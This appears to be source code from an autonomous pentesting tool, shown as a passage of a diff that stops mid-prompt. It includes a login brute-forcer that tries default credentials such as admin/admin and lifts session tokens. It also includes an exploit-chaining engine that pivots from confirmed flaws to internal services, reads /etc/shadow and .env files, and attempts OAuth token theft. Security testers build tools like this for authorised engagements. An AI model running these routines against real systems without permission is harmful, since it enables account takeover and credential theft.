# Default credentials to try on admin panels
DEFAULT_CREDENTIALS = [
Credentials("admin", "admin", "admin", "default"),
Credentials("admin", "password", "admin", "default"),
Credentials("admin", "admin123", "admin", "default"),
Credentials("root", "root", "admin", "default"),
Credentials("test", "test", "user", "default"),
Credentials("user", "user", "user", "default"),
Credentials("admin", "Password1", "admin", "default"),
Credentials("administrator", "administrator", "admin", "default"),
]
# Session expiry indicators
EXPIRY_INDICATORS = [
"session expired", "session timeout", "please log in",
"please login", "sign in again", "token expired",
"unauthorized", "authentication required", "not authenticated",
"jwt expired", "invalid token", "access token expired",
]
# Login success indicators
SUCCESS_INDICATORS = [
"welcome", "dashboard", "my account", "profile",
"logged in", "sign out", "logout", "log out",
"home", "settings", "preferences",
]
# Login failure indicators
FAILURE_INDICATORS = [
"invalid", "incorrect", "wrong", "failed", "error",
"denied", "bad credentials", "authentication failed",
"login failed", "invalid username", "invalid password",
]
def __init__(self, request_engine=None, recon=None):
self.request_engine = request_engine
self.recon = recon
# Credential store
self._credentials: Dict[str, List[Credentials]] = {
"user": [],
"admin": [],
}
# Session contexts
self.contexts: Dict[str, SessionContext] = {
"user_a": SessionContext(name="user_a", role="user"),
"user_b": SessionContext(name="user_b", role="user"),
"admin": SessionContext(name="admin", role="admin"),
}
# Discovered login forms
self._login_forms: List[LoginForm] = []
self._login_attempts = 0
self._successful_logins = 0
# --- Credential Management -------------------------------------------
def add_credentials(self, username: str, password: str, role: str = "user", source: str = "provided"):
"""Add credentials for testing."""
cred = Credentials(username, password, role, source)
self._credentials.setdefault(role, []).append(cred)
logger.debug(f"Added {role} credentials: {username} (source: {source})")
def add_discovered_credentials(self, creds_list: List[Dict]):
"""Add credentials discovered during testing (from info disclosure, etc.)."""
for cred_info in creds_list:
username = cred_info.get("username", "")
password = cred_info.get("password", "")
if username and password:
self.add_credentials(username, password, role="user", source="discovered")
def get_credentials_for_role(self, role: str) -> List[Credentials]:
"""Get all credentials for a role."""
creds = self._credentials.get(role, [])
if not creds and role == "admin":
return self.DEFAULT_CREDENTIALS[:4] # Only admin defaults
if not creds and role == "user":
return self.DEFAULT_CREDENTIALS[4:6] # Only user defaults
return creds
# --- Login Form Detection --------------------------------------------
def detect_login_forms(self, html: str, page_url: str) -> List[LoginForm]:
"""Detect login forms in HTML content."""
forms = []
# Find all <form> tags
form_pattern = re.compile(
r'<form[^>]*>(.*?)</form>',
re.DOTALL | re.IGNORECASE
)
for form_match in form_pattern.finditer(html):
form_html = form_match.group(0)
form_inner = form_match.group(1)
# Check if this looks like a login form
has_password = bool(re.search(r'type=["\']password["\']', form_inner, re.I))
if not has_password:
continue
# Extract form action
action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I)
action = action_match.group(1) if action_match else page_url
if not action.startswith("http"):
action = urljoin(page_url, action)
# Extract method
method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I)
method = (method_match.group(1) if method_match else "POST").upper()
# Find username field
username_field = self._find_username_field(form_inner)
# Find password field
password_field = self._find_field_name(form_inner, r'type=["\']password["\']')
# Find CSRF token
csrf_field, csrf_value = self._find_csrf_token(form_inner)
# Find hidden fields
extra_fields = self._find_hidden_fields(form_inner)
if csrf_field and csrf_field in extra_fields:
del extra_fields[csrf_field]
# Calculate confidence
confidence = 0.5 # Has password field
login_keywords = ["login", "signin", "sign-in", "auth", "log-in", "session"]
if any(kw in action.lower() for kw in login_keywords):
confidence += 0.3
if any(kw in form_html.lower() for kw in login_keywords):
confidence += 0.2
if username_field and password_field:
forms.append(LoginForm(
url=action,
method=method,
username_field=username_field,
password_field=password_field,
csrf_field=csrf_field,
csrf_value=csrf_value,
extra_fields=extra_fields,
confidence=min(1.0, confidence),
))
# Sort by confidence
forms.sort(key=lambda f: f.confidence, reverse=True)
self._login_forms.extend(forms)
return forms
def _find_username_field(self, html: str) -> Optional[str]:
"""Find the username/email input field name."""
# Priority: explicit username/email fields
patterns = [
r'name=["\']([^"\']*(?:user|login|email|account)[^"\']*)["\']',
r'name=["\']([^"\']*)["\'].*?type=["\'](?:text|email)["\']',
r'type=["\'](?:text|email)["\'].*?name=["\']([^"\']*)["\']',
]
for pattern in patterns:
match = re.search(pattern, html, re.I)
if match:
return match.group(1)
return None
def _find_field_name(self, html: str, type_pattern: str) -> Optional[str]:
"""Find field name for a given input type pattern."""
# Try: name="x" ... type="password"
match = re.search(
r'name=["\']([^"\']+)["\'][^>]*' + type_pattern,
html, re.I
)
if match:
return match.group(1)
# Try: type="password" ... name="x"
match = re.search(
type_pattern + r'[^>]*name=["\']([^"\']+)["\']',
html, re.I
)
if match:
return match.group(1)
return None
def _find_csrf_token(self, html: str):
"""Find CSRF token in form."""
csrf_patterns = [
r'name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken|__RequestVerificationToken|authenticity_token|_csrf_token)[^"\']*)["\'][^>]*value=["\']([^"\']*)["\']',
r'value=["\']([^"\']*)["\'][^>]*name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken)[^"\']*)["\']',
]
for pattern in csrf_patterns:
match = re.search(pattern, html, re.I)
if match:
groups = match.groups()
if "csrf" in groups[0].lower() or "_token" in groups[0].lower():
return groups[0], groups[1]
return groups[1], groups[0]
return None, None
def _find_hidden_fields(self, html: str) -> Dict[str, str]:
"""Extract all hidden field name-value pairs."""
fields = {}
pattern = re.compile(
r'type=["\']hidden["\'][^>]*name=["\']([^"\']+)["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern.finditer(html):
fields[match.group(1)] = match.group(2)
# Also try reverse order (name before type)
pattern2 = re.compile(
r'name=["\']([^"\']+)["\'][^>]*type=["\']hidden["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern2.finditer(html):
fields[match.group(1)] = match.group(2)
return fields
# --- Authentication --------------------------------------------------
async def authenticate(self, context_name: str = "user_a") -> bool:
"""Attempt to authenticate a session context.
Tries login forms with available credentials.
Returns True if authentication succeeded.
"""
if not self.request_engine:
return False
ctx = self.contexts.get(context_name)
if not ctx:
return False
ctx.state = "authenticating"
creds = self.get_credentials_for_role(ctx.role)
if not creds:
logger.debug(f"No credentials available for {context_name} ({ctx.role})")
ctx.state = "unauthenticated"
return False
# Find login forms if not already discovered
if not self._login_forms:
await self._discover_login_forms()
if not self._login_forms:
logger.debug("No login forms found")
ctx.state = "unauthenticated"
return False
# Try each form with each credential
for form in self._login_forms:
for cred in creds:
self._login_attempts += 1
success = await self._attempt_login(form, cred, ctx)
if success:
ctx.state = "authenticated"
ctx.credential = cred
ctx.login_time = time.time()
ctx.login_url = form.url
self._successful_logins += 1
logger.info(f"Login success: {context_name} as {cred.username} ({cred.role})")
return True
ctx.state = "unauthenticated"
return False
async def _discover_login_forms(self):
"""Discover login forms by crawling common login paths."""
if not self.request_engine:
return
# Use recon data if available
target = ""
if self.recon and hasattr(self.recon, "target"):
target = self.recon.target
if not target:
return
login_paths = [
"/login", "/signin", "/sign-in", "/auth/login",
"/user/login", "/admin/login", "/api/auth/login",
"/account/login", "/wp-login.php", "/admin",
]
parsed = urlparse(target)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in login_paths:
try:
url = f"{base}{path}"
result = await self.request_engine.request(url, method="GET")
if result and result.status == 200 and result.body:
forms = self.detect_login_forms(result.body, url)
if forms:
logger.debug(f"Found {len(forms)} login form(s) at {url}")
return # Found forms, stop searching
except Exception:
continue
async def _attempt_login(self, form: LoginForm, cred: Credentials, ctx: SessionContext) -> bool:
"""Attempt login with a specific form and credential."""
try:
# Build form data
data = {}
# Add hidden fields first
data.update(form.extra_fields)
# Refresh CSRF token if needed
if form.csrf_field:
fresh_csrf = await self._refresh_csrf(form)
if fresh_csrf:
data[form.csrf_field] = fresh_csrf
elif form.csrf_value:
data[form.csrf_field] = form.csrf_value
# Add credentials
data[form.username_field] = cred.username
data[form.password_field] = cred.password
# Submit form
result = await self.request_engine.request(
form.url,
method=form.method,
data=data,
allow_redirects=True,
)
if not result:
return False
# Check for login success
success = self._detect_login_success(
result.body, result.status, result.headers
)
if success:
# Extract tokens and cookies
self._extract_session_data(result, ctx)
return True
return False
except Exception as e:
logger.debug(f"Login attempt failed: {e}")
return False
async def _refresh_csrf(self, form: LoginForm) -> Optional[str]:
"""Fetch fresh CSRF token from the login page."""
try:
# GET the form page to get a fresh token
page_url = form.url.replace(urlparse(form.url).path, "") + urlparse(form.url).path
result = await self.request_engine.request(page_url, method="GET")
if result and result.body:
_, csrf_value = self._find_csrf_token(result.body)
return csrf_value
except Exception:
pass
return None
def _detect_login_success(self, body: str, status: int, headers: Dict) -> bool:
"""Detect if login was successful."""
body_lower = (body or "").lower()
# Check for redirect to authenticated area
if status in (301, 302, 303, 307):
location = headers.get("Location", headers.get("location", ""))
if any(kw in location.lower() for kw in ["dashboard", "home", "profile", "admin"]):
return True
# Check for Set-Cookie (session creation)
has_session_cookie = any(
"set-cookie" in k.lower() for k in headers
)
# Check for success indicators in body
success_count = sum(1 for kw in self.SUCCESS_INDICATORS if kw in body_lower)
failure_count = sum(1 for kw in self.FAILURE_INDICATORS if kw in body_lower)
# Success if: session cookie + success indicators and no failure indicators
if has_session_cookie and success_count > 0 and failure_count == 0:
return True
# Success if: 200 OK + strong success indicators + no failure
if status == 200 and success_count >= 2 and failure_count == 0:
return True
return False
def _extract_session_data(self, result, ctx: SessionContext):
"""Extract tokens and cookies from a successful login response."""
# Extract cookies from Set-Cookie headers
for key, value in result.headers.items():
if key.lower() == "set-cookie":
cookie_parts = value.split(";")[0].split("=", 1)
if len(cookie_parts) == 2:
ctx.cookies[cookie_parts[0].strip()] = cookie_parts[1].strip()
# Extract tokens from response body (JSON)
body = result.body or ""
token_patterns = [
(r'"(?:access_token|token|jwt|bearer|id_token)"\s*:\s*"([^"]+)"', "bearer"),
(r'"(?:api_key|apikey|api-key)"\s*:\s*"([^"]+)"', "api_key"),
(r'"(?:refresh_token)"\s*:\s*"([^"]+)"', "refresh"),
]
for pattern, token_type in token_patterns:
match = re.search(pattern, body, re.I)
if match:
ctx.tokens[token_type] = match.group(1)
# Build auth headers
if "bearer" in ctx.tokens:
ctx.headers["Authorization"] = f"Bearer {ctx.tokens['bearer']}"
elif "api_key" in ctx.tokens:
ctx.headers["X-API-Key"] = ctx.tokens["api_key"]
# --- Session Management ----------------------------------------------
def detect_session_expiry(self, body: str, status: int) -> bool:
"""Check if a response indicates session expiry."""
if status in (401, 403):
return True
body_lower = (body or "").lower()
return any(kw in body_lower for kw in self.EXPIRY_INDICATORS)
async def refresh(self, context_name: Optional[str] = None) -> bool:
"""Refresh an expired session by re-authenticating.
If context_name is None, refresh all expired sessions.
"""
contexts_to_refresh = []
if context_name:
ctx = self.contexts.get(context_name)
if ctx and ctx.state == "expired":
contexts_to_refresh.append(context_name)
else:
for name, ctx in self.contexts.items():
if ctx.state == "expired":
contexts_to_refresh.append(name)
results = []
for name in contexts_to_refresh:
ctx = self.contexts[name]
ctx.state = "unauthenticated"
ctx.cookies.clear()
ctx.tokens.clear()
ctx.headers.clear()
success = await self.authenticate(name)
results.append(success)
return all(results) if results else False
def check_and_mark_expiry(self, context_name: str, body: str, status: int) -> bool:
"""Check response for expiry and mark context if expired.
Returns True if session was detected as expired.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return False
if self.detect_session_expiry(body, status):
ctx.state = "expired"
logger.info(f"Session expired for {context_name}")
return True
# Check time-based expiry
if ctx.login_time and (time.time() - ctx.login_time) > ctx.session_duration:
ctx.state = "expired"
logger.info(f"Session timeout for {context_name}")
return True
return False
# --- Request Integration ---------------------------------------------
def get_context(self, context_name: str) -> Optional[SessionContext]:
"""Get a session context by name."""
return self.contexts.get(context_name)
def get_request_kwargs(self, context_name: str) -> Dict:
"""Get headers and cookies for requests as a context.
Returns dict with 'headers' and 'cookies' ready for request_engine.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return {"headers": {}, "cookies": {}}
return {
"headers": dict(ctx.headers),
"cookies": dict(ctx.cookies),
}
def is_authenticated(self, context_name: str) -> bool:
"""Check if a context is currently authenticated."""
ctx = self.contexts.get(context_name)
return ctx is not None and ctx.state == "authenticated"
def get_auth_summary(self) -> Dict:
"""Get summary of authentication state for reporting."""
return {
"contexts": {
name: {
"state": ctx.state,
"role": ctx.role,
"credential": ctx.credential.username if ctx.credential else None,
"has_tokens": bool(ctx.tokens),
"has_cookies": bool(ctx.cookies),
}
for name, ctx in self.contexts.items()
},
"login_forms_found": len(self._login_forms),
"login_attempts": self._login_attempts,
"successful_logins": self._successful_logins,
"credentials_available": {
role: len(creds)
for role, creds in self._credentials.items()
},
}
File diff suppressed because it is too large Load Diff
+629
View File
@@ -0,0 +1,629 @@
"""
NeuroSploit v3 - Exploit Chain Engine
Finding correlation, derived target generation, and attack graph
construction for autonomous pentesting. When a vulnerability is
confirmed, this engine generates follow-up targets based on 10
chain rules.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List, Optional
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class ChainableTarget:
    """A derived attack target generated from a confirmed finding."""
    # Full URL to attack.
    url: str
    # Parameter (query/body field) to inject into; may be empty for path-level tests.
    param: str
    # Vulnerability type to test on this target (e.g. "lfi", "sqli_union").
    vuln_type: str
    # Free-form metadata from the extraction rule (e.g. db_type, source rule name).
    context: Dict[str, Any] = field(default_factory=dict)
    # Number of chain hops that led here; set by ChainEngine.on_finding.
    chain_depth: int = 1
    # ID of the confirmed finding that spawned this target.
    parent_finding_id: str = ""
    priority: int = 2  # 1=critical, 2=high, 3=medium
    # HTTP method to use when testing.
    method: str = "GET"
    # Where the payload is injected ("parameter" by default).
    injection_point: str = "parameter"
    # Optional hint forwarded to payload generation (e.g. a file path for LFI).
    payload_hint: Optional[str] = None
    # Human-readable explanation of why this target was derived.
    description: str = ""
@dataclass
class ChainRule:
    """Defines how a finding triggers derived targets."""
    trigger_type: str  # Vuln type that triggers this rule
    derived_types: List[str]  # Types to test on derived targets
    extraction_fn: str  # Method name for target extraction
    # Priority assigned to the ChainableTargets this rule generates (1=highest).
    priority: int = 2
    # NOTE(review): not consulted by ChainEngine.on_finding, which applies its
    # own MAX_CHAIN_DEPTH instead — kept as rule metadata.
    max_depth: int = 3
    # Human-readable summary of the chain this rule encodes.
    description: str = ""
# 10 chain rules
# Each rule maps a confirmed vulnerability type (trigger_type) to the follow-up
# vuln types worth testing and the ChainEngine method (extraction_fn) that
# turns the finding into concrete derived targets.
CHAIN_RULES: List[ChainRule] = [
    ChainRule(
        trigger_type="ssrf",
        derived_types=["lfi", "xxe", "command_injection", "ssrf"],
        extraction_fn="_extract_internal_urls",
        priority=1,
        description="SSRF → internal service attacks",
    ),
    ChainRule(
        trigger_type="sqli_error",
        derived_types=["sqli_union", "sqli_blind", "sqli_time"],
        extraction_fn="_extract_db_context",
        priority=1,
        description="SQLi error → advanced SQLi techniques",
    ),
    ChainRule(
        trigger_type="information_disclosure",
        derived_types=["auth_bypass", "default_credentials"],
        extraction_fn="_extract_credentials",
        priority=1,
        description="Info disclosure → credential-based attacks",
    ),
    ChainRule(
        trigger_type="idor",
        derived_types=["idor", "bola", "bfla"],
        extraction_fn="_extract_idor_patterns",
        priority=2,
        description="IDOR on one resource → same pattern on sibling resources",
    ),
    ChainRule(
        trigger_type="lfi",
        derived_types=["sqli", "auth_bypass", "information_disclosure"],
        extraction_fn="_extract_config_paths",
        priority=1,
        description="LFI → config file extraction → credential discovery",
    ),
    ChainRule(
        trigger_type="xss_reflected",
        derived_types=["xss_stored", "cors_misconfiguration"],
        extraction_fn="_extract_xss_chain",
        priority=2,
        description="Reflected XSS → stored XSS / CORS chain for session theft",
    ),
    ChainRule(
        trigger_type="open_redirect",
        derived_types=["ssrf", "oauth_misconfiguration"],
        extraction_fn="_extract_redirect_chain",
        priority=1,
        description="Open redirect → OAuth token theft chain",
    ),
    ChainRule(
        trigger_type="default_credentials",
        derived_types=["auth_bypass", "privilege_escalation", "idor"],
        extraction_fn="_extract_auth_chain",
        priority=1,
        description="Default creds → authenticated attacks",
    ),
    ChainRule(
        trigger_type="exposed_admin_panel",
        derived_types=["default_credentials", "auth_bypass", "brute_force"],
        extraction_fn="_extract_admin_chain",
        priority=1,
        description="Exposed admin → credential attack on admin panel",
    ),
    ChainRule(
        trigger_type="subdomain_takeover",
        derived_types=["xss_reflected", "xss_stored", "ssrf"],
        extraction_fn="_extract_subdomain_targets",
        priority=3,
        description="Subdomain discovery → new attack surface",
    ),
]
class ChainEngine:
    """Exploit chain engine for finding correlation and derived target generation.
    When a vulnerability is confirmed, this engine:
    1. Checks chain rules for matching trigger types
    2. Extracts derived targets using rule-specific extraction functions
    3. Generates ChainableTarget objects for the agent to test
    4. Tracks chain depth to prevent infinite recursion
    5. Builds an attack graph of finding → finding relationships
    Usage:
        engine = ChainEngine()
        derived = await engine.on_finding(finding, recon, memory)
        for target in derived:
            # Test target through normal vuln testing pipeline
            pass
    """
    # Hard ceiling on chain hops: a finding at this depth spawns nothing.
    MAX_CHAIN_DEPTH = 3
    # Cap on derived targets per finding, to bound the test queue.
    MAX_DERIVED_PER_FINDING = 20

    def __init__(self, llm=None):
        self.llm = llm
        self._chain_graph: Dict[str, List[str]] = {}  # finding_id → ["vuln_type:url", ...]
        self._total_chains = 0
        self._chain_findings: List[str] = []  # finding IDs that came from chaining

    async def on_finding(
        self,
        finding: Any,
        recon: Any = None,
        memory: Any = None,
    ) -> List[ChainableTarget]:
        """Process a confirmed finding and generate derived targets.
        Args:
            finding: The confirmed Finding object
            recon: ReconData with target info
            memory: AgentMemory for dedup
        Returns:
            List of ChainableTarget objects to test
        """
        vuln_type = getattr(finding, "vulnerability_type", "")
        finding_id = getattr(finding, "id", str(id(finding)))
        chain_depth = getattr(finding, "_chain_depth", 0)
        # Prevent infinite chaining
        if chain_depth >= self.MAX_CHAIN_DEPTH:
            return []
        derived_targets = []
        for rule in CHAIN_RULES:
            # Check trigger match (exact or prefix)
            if not self._matches_trigger(vuln_type, rule.trigger_type):
                continue
            # Extract targets using rule's extraction function
            extractor = getattr(self, rule.extraction_fn, None)
            if not extractor:
                continue
            try:
                targets = extractor(finding, recon)
                for target in targets[:self.MAX_DERIVED_PER_FINDING]:
                    # Stamp lineage so derived findings can themselves be capped.
                    target.chain_depth = chain_depth + 1
                    target.parent_finding_id = finding_id
                    target.priority = rule.priority
                    derived_targets.append(target)
            except Exception as e:
                # A broken extractor must not kill the whole chain pass.
                logger.debug(f"Chain extraction failed for {rule.extraction_fn}: {e}")
        # Track in graph
        if derived_targets:
            self._chain_graph[finding_id] = [
                f"{t.vuln_type}:{t.url}" for t in derived_targets
            ]
            self._total_chains += len(derived_targets)
            logger.debug(f"Chain engine: {vuln_type} → {len(derived_targets)} derived targets")
        return derived_targets[:self.MAX_DERIVED_PER_FINDING]

    def _matches_trigger(self, vuln_type: str, trigger: str) -> bool:
        """Check if vuln_type matches a trigger rule."""
        if vuln_type == trigger:
            return True
        # Prefix matching in either direction, e.g. "sqli" vs "sqli_error".
        if vuln_type.startswith(trigger + "_") or trigger.startswith(vuln_type + "_"):
            return True
        # Special: any sqli variant triggers sqli_error rule
        if trigger == "sqli_error" and vuln_type.startswith("sqli"):
            return True
        return False

    # --- Extraction Functions --------------------------------------------
    def _extract_internal_urls(self, finding, recon) -> List[ChainableTarget]:
        """From SSRF: extract internal URLs for further attack."""
        targets = []
        evidence = getattr(finding, "evidence", "")
        # Find internal (RFC 1918 / loopback) IPs in the response evidence.
        internal_patterns = [
            r'(?:https?://)?(?:127\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
            r'(?:https?://)?(?:10\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
            r'(?:https?://)?(?:192\.168\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
            r'(?:https?://)?(?:172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
            r'(?:https?://)?localhost(?::\d+)?(?:/[^\s"<>]*)?',
        ]
        found_urls = set()
        for pattern in internal_patterns:
            for match in re.finditer(pattern, evidence):
                internal_url = match.group(0)
                if not internal_url.startswith("http"):
                    internal_url = f"http://{internal_url}"
                found_urls.add(internal_url)
        # Nothing leaked in the evidence: probe common loopback services instead.
        if not found_urls:
            base_ips = ["127.0.0.1", "localhost"]
            ports = [80, 8080, 8443, 3000, 5000, 8000, 9200, 6379, 27017]
            for ip in base_ips:
                for port in ports[:4]:  # Limit
                    found_urls.add(f"http://{ip}:{port}/")
        for internal_url in list(found_urls)[:10]:
            for vuln_type in ["lfi", "command_injection", "ssrf"]:
                targets.append(ChainableTarget(
                    url=internal_url,
                    param="url",
                    vuln_type=vuln_type,
                    context={"source": "ssrf_chain", "internal": True},
                    description=f"SSRF chain: {vuln_type} on internal {internal_url}",
                ))
        return targets

    def _extract_db_context(self, finding, recon) -> List[ChainableTarget]:
        """From SQLi error: extract DB type and generate advanced payloads."""
        targets = []
        evidence = getattr(finding, "evidence", "")
        url = getattr(finding, "url", "")
        param = getattr(finding, "parameter", "")
        # Detect database type from error
        db_type = "unknown"
        db_indicators = {
            "mysql": ["mysql", "mariadb", "you have an error in your sql syntax"],
            "postgresql": ["postgresql", "pg_", "unterminated quoted string"],
            "mssql": ["microsoft sql", "mssql", "unclosed quotation mark", "sqlserver"],
            "oracle": ["ora-", "oracle", "quoted string not properly terminated"],
            "sqlite": ["sqlite", "sqlite3"],
        }
        evidence_lower = evidence.lower()
        for db, indicators in db_indicators.items():
            if any(i in evidence_lower for i in indicators):
                db_type = db
                break
        # Generate type-specific advanced SQLi targets
        advanced_types = ["sqli_union", "sqli_blind", "sqli_time"]
        for vuln_type in advanced_types:
            targets.append(ChainableTarget(
                url=url,
                param=param,
                vuln_type=vuln_type,
                context={"db_type": db_type, "source": "sqli_chain"},
                description=f"SQLi chain: {vuln_type} ({db_type}) on {param}",
                payload_hint=f"db_type={db_type}",
            ))
        return targets

    def _extract_credentials(self, finding, recon) -> List[ChainableTarget]:
        """From info disclosure: extract credentials for auth attacks."""
        targets = []
        evidence = getattr(finding, "evidence", "")
        url = getattr(finding, "url", "")
        # Extract potential credentials. Each pattern carries an explicit label:
        # the previous key derivation (pattern.split("|")[0].strip("(?"))
        # produced mangled keys such as ":password".
        cred_patterns = [
            ("password", r'(?:password|passwd|pwd)\s*[=:]\s*["\']?([^\s"\'<>&]+)'),
            ("api_key", r'(?:api_key|apikey|api-key)\s*[=:]\s*["\']?([^\s"\'<>&]+)'),
            ("token", r'(?:token|secret|auth)\s*[=:]\s*["\']?([^\s"\'<>&]+)'),
            ("username", r'(?:username|user|login)\s*[=:]\s*["\']?([^\s"\'<>&]+)'),
        ]
        found_creds = {}
        for label, pattern in cred_patterns:
            matches = re.findall(pattern, evidence, re.I)
            for match in matches:
                if len(match) > 3:  # Skip trivial matches
                    found_creds[label] = match
        # Generate auth attack targets
        if recon:
            parsed = urlparse(url)
            base = f"{parsed.scheme}://{parsed.netloc}"
            admin_paths = ["/admin", "/api/admin", "/dashboard", "/management"]
            for path in admin_paths:
                targets.append(ChainableTarget(
                    url=f"{base}{path}",
                    param="",
                    vuln_type="auth_bypass",
                    context={"discovered_creds": found_creds, "source": "info_disclosure_chain"},
                    description=f"Credential chain: auth bypass at {path}",
                ))
        return targets

    def _extract_idor_patterns(self, finding, recon) -> List[ChainableTarget]:
        """From IDOR: apply same pattern to sibling resources."""
        targets = []
        url = getattr(finding, "url", "")
        param = getattr(finding, "parameter", "")
        parsed = urlparse(url)
        path = parsed.path
        # Pattern: /users/{id} → /orders/{id}, /profiles/{id}
        sibling_resources = [
            "users", "orders", "profiles", "accounts", "invoices",
            "documents", "messages", "transactions", "settings",
            "notifications", "payments", "subscriptions",
        ]
        # Extract the resource pattern
        path_parts = [p for p in path.split("/") if p]
        if len(path_parts) >= 2:
            # Replace the resource name with siblings
            original_resource = path_parts[-2] if path_parts[-1].isdigit() else path_parts[-1]
            base = f"{parsed.scheme}://{parsed.netloc}"
            for sibling in sibling_resources:
                if sibling != original_resource:
                    new_path = path.replace(original_resource, sibling)
                    targets.append(ChainableTarget(
                        url=f"{base}{new_path}",
                        param=param or "id",
                        vuln_type="idor",
                        context={"source": "idor_pattern_chain", "original_resource": original_resource},
                        description=f"IDOR chain: {sibling} (from {original_resource})",
                        method=getattr(finding, "method", "GET"),
                    ))
        return targets[:10]

    def _extract_config_paths(self, finding, recon) -> List[ChainableTarget]:
        """From LFI: generate config file read targets."""
        targets = []
        url = getattr(finding, "url", "")
        param = getattr(finding, "parameter", "")
        # Config files that may contain credentials
        config_files = [
            "/etc/passwd",
            "/etc/shadow",
            "../../../../.env",
            "../../../../config/database.yml",
            "../../../../wp-config.php",
            "../../../../config.php",
            "../../../../.git/config",
            "../../../../config/secrets.yml",
            "/proc/self/environ",
            "../../../../application.properties",
            "../../../../appsettings.json",
            "../../../../web.config",
        ]
        for config_path in config_files:
            targets.append(ChainableTarget(
                url=url,
                param=param,
                vuln_type="lfi",
                context={"config_file": config_path, "source": "lfi_chain"},
                description=f"LFI chain: read {config_path}",
                payload_hint=config_path,
            ))
        return targets

    def _extract_xss_chain(self, finding, recon) -> List[ChainableTarget]:
        """From reflected XSS: look for stored XSS and CORS chain opportunities."""
        targets = []
        url = getattr(finding, "url", "")
        param = getattr(finding, "parameter", "")
        parsed = urlparse(url)
        base = f"{parsed.scheme}://{parsed.netloc}"
        # Look for form submission endpoints (potential stored XSS)
        if recon and hasattr(recon, "forms"):
            for form in getattr(recon, "forms", [])[:5]:
                form_url = form.get("action", "") if isinstance(form, dict) else getattr(form, "action", "")
                if form_url:
                    targets.append(ChainableTarget(
                        url=form_url,
                        param=param,
                        vuln_type="xss_stored",
                        context={"source": "xss_chain"},
                        description=f"XSS chain: stored XSS via form at {form_url}",
                        method="POST",
                    ))
        # Check for CORS misconfiguration chain
        targets.append(ChainableTarget(
            url=base + "/api/",
            param="",
            vuln_type="cors_misconfiguration",
            context={"source": "xss_cors_chain"},
            description="XSS+CORS chain: check CORS for session theft scenario",
        ))
        return targets

    def _extract_redirect_chain(self, finding, recon) -> List[ChainableTarget]:
        """From open redirect: chain to OAuth token theft."""
        targets = []
        url = getattr(finding, "url", "")
        param = getattr(finding, "parameter", "")
        parsed = urlparse(url)
        base = f"{parsed.scheme}://{parsed.netloc}"
        # OAuth endpoints to test
        oauth_paths = [
            "/oauth/authorize", "/auth/authorize", "/oauth2/authorize",
            "/connect/authorize", "/.well-known/openid-configuration",
            "/api/oauth/callback",
        ]
        for path in oauth_paths:
            targets.append(ChainableTarget(
                url=f"{base}{path}",
                param="redirect_uri",
                vuln_type="open_redirect",
                context={"source": "redirect_oauth_chain"},
                description=f"Redirect chain: OAuth token theft via {path}",
            ))
        # SSRF via redirect
        targets.append(ChainableTarget(
            url=url,
            param=param,
            vuln_type="ssrf",
            context={"source": "redirect_ssrf_chain"},
            description="Redirect → SSRF chain",
        ))
        return targets

    def _extract_auth_chain(self, finding, recon) -> List[ChainableTarget]:
        """From default credentials: test all endpoints as authenticated user."""
        targets = []
        url = getattr(finding, "url", "")
        parsed = urlparse(url)
        base = f"{parsed.scheme}://{parsed.netloc}"
        # Privileged paths to test with obtained session
        privileged_paths = [
            "/admin", "/admin/users", "/admin/settings",
            "/api/admin", "/api/users", "/api/v1/admin",
            "/management", "/internal", "/debug",
        ]
        for path in privileged_paths:
            targets.append(ChainableTarget(
                url=f"{base}{path}",
                param="",
                vuln_type="privilege_escalation",
                context={"source": "auth_chain", "authenticated": True},
                description=f"Auth chain: privilege escalation at {path}",
            ))
        return targets

    def _extract_admin_chain(self, finding, recon) -> List[ChainableTarget]:
        """From exposed admin panel: try default credentials and auth bypass."""
        targets = []
        url = getattr(finding, "url", "")
        targets.append(ChainableTarget(
            url=url,
            param="",
            vuln_type="default_credentials",
            context={"source": "admin_chain"},
            description=f"Admin chain: default credentials at {url}",
        ))
        targets.append(ChainableTarget(
            url=url,
            param="",
            vuln_type="auth_bypass",
            context={"source": "admin_chain"},
            description=f"Admin chain: auth bypass at {url}",
        ))
        return targets

    def _extract_subdomain_targets(self, finding, recon) -> List[ChainableTarget]:
        """From subdomain discovery: add as new attack targets."""
        targets = []
        evidence = getattr(finding, "evidence", "")
        # Extract subdomains from evidence
        subdomain_pattern = r'(?:https?://)?([a-zA-Z0-9][-a-zA-Z0-9]*\.[-a-zA-Z0-9.]+)'
        found_domains = set(re.findall(subdomain_pattern, evidence))
        for domain in list(found_domains)[:5]:
            if not domain.startswith("http"):
                domain_url = f"https://{domain}"
            else:
                domain_url = domain
            targets.append(ChainableTarget(
                url=domain_url,
                param="",
                vuln_type="xss_reflected",
                context={"source": "subdomain_chain"},
                description=f"Subdomain chain: test {domain}",
                priority=3,
            ))
        return targets

    # --- AI Correlation ---------------------------------------------------
    async def ai_correlate(self, findings: List[Any], llm=None) -> List[Dict]:
        """AI-driven correlation of multiple findings into attack chains.
        Analyzes all findings together to identify multi-step attack scenarios.
        """
        llm = llm or self.llm
        if not llm or not hasattr(llm, "generate"):
            return []
        if len(findings) < 2:
            return []
        try:
            findings_summary = []
            for f in findings[:20]:
                findings_summary.append(
                    f"- {getattr(f, 'vulnerability_type', '?')}: "
                    f"{getattr(f, 'url', '?')} "
                    f"(param: {getattr(f, 'parameter', '?')}, "
                    f"confidence: {getattr(f, 'confidence_score', '?')})"
                )
            prompt = f"""Analyze these confirmed vulnerability findings for potential exploit chains.
FINDINGS:
{chr(10).join(findings_summary)}
For each chain you identify, describe:
1. The attack scenario (2-3 sentences)
2. Which findings are linked
